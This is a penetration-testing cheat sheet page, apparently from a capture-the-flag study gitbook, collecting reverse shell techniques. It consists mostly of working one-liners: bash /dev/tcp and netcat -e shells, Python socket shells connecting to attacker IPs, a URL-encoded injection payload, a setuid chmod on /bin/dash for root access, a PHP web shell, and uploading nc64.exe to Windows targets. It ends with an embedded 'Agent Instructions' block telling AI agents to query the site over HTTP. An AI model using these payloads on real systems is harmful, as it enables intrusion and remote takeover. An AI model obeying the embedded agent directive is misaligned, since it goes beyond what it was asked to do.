# Shells ## Links * Web * [gtfobins.github.io](https://gtfobins.github.io) * [PentestMonkey.net\_ReverseShells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) * [Reverse Shell Generator: Suggestion Tool](https://github.com/mthbernardes/rsg) * [Reverse-shells-one-liners](http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html) * Gitbook * [MetasploitVenom](/03-getting-in/03-metasploit.md#venom) * [PrivEscVenom](/07-win-privesc/win-privesc.md#basic-venom-reverse-shell) * [FtpHttpVulnWebshell](/03-getting-in/ftp.md#ftphttp-vulnerability) ## Basics * Host: Setup the listener to catch the reverse shell * nc -nvlp 1234 * Target: Upload your reverse shell, navigate, execute, connect * [http://rhost/404.php](http://192.168.50.102/404.php) * Example: BashedHTB sends a **php reverse shell** with wget ## Easy Test Connect ``` nc -e /bin/bash $IP 4444 netcat -e /bin/bash $MyIP 4444 bash -i >& /dev/tcp/$MyIP/4444 0>&1 nc -nlvp 4444 ``` ## PHP web shell * Upload this simple 'shell.php', and call it using parameter 'cmd=uname' * Consider, you might need to send 'shell.php3' to avoid the block/filter. * REF: [PhpTricks](/04-webapps/php-tricks.md), [FtpHttpVuln](/03-getting-in/ftp.md#scenario-ftp-http) ``` Execute: http://abc.so/upload/shell.php?cmd=uname -a ``` ## Python ``` #!/usr/bin/env python import os import sys try: #os.system('/usr/bin/touch /tmp/hello') ...test #os.system('bash -i /dev/tcp/$MyIP/4444 0>&1') ...reverse shell os.system('chmod 4755 /bin/dash') ...rootbash except: sys.exit() ``` ```python This worked for htb-bashed: Root process auto-executes python scripts: import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.15",5555)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]); ``` ``` Script: http://10.10.10.168:8080/ import socket,subprocess,os bs; socket.socket(socket.AF_INET,socket.SOCK_STREAM); ns.connect(("10.10.15.30",51000)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("/bin/bash")# HTTP/1.1 Bash Script/Shell (privesc) #!/usr/bin/python import socket import subprocess import os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.52",8080)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]); ``` #### By Burp ``` Readable: /'\nimport socket,subprocess,os;\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\ns.connect((\"10.10.15.30\",51000));\nos.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);\nimport pty;\npty.spawn(\"/bin/bash\")# Web-Encoded: /'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1 ``` #### Browser ``` http://10.10.10.168:8080/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1 --Remember to include the HTTP/1.1 ``` ## Bash Reverse * REF: [ApacheJamesEmail](/04-webapps/apache.md#apache-james-server-2-3-2) ``` bash -i >& /dev/tcp/192.168.1.26/53 0>&1 payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1' payload = 'nc -e /bin/bash $MyIP 4444 &' ``` ## Powershell Reverse * [WindowsPrivEsc-Powershell](/07-win-privesc/win-kernelexp.md#juicy-potato-powershell) ## netcat * Create a python reverse shell * Listener #1: Share rshell with < * Listener #2: Wait for incoming * LFI: Execute nc to pickup rshell and execute it ``` rce > nc > python > nc/rshell Python Reverse Shell vim cmd ..connect(("10.10.14.6",1234)) nc -nvlp 9001 < cmd ..send/share the file nc -nvlp 1234 ..catch shell ..queues;nc+10.10.10.6+9001|python+& ..fail ..queues;nc+10.10.10.6+9001|python ..ok pull file, python execute connected! ``` ## Windows netcat * Windows Target might not have netcat * Download and send the nc64.exe (assuming they are using 64bit) * Execute your nc64.exe to send a ReverseShell[ ](/03-getting-in/03-reverseshell-php.md)back to yourself * Ex: [DrupalPhpVuln](/04-webapps/drupal.md#reverse) ``` Download 64-bit netcat nc64.exe: upload and execute http://10.x.x.x/ippsec.php?fupload=nc64.exe http://10.x.x.x/ippsec.php?fexec=nc64.exe -e cmd $MyIP 8081 nc -nvlp 8081 ``` ## --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/03-getting-in/03-reverseshell-php.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.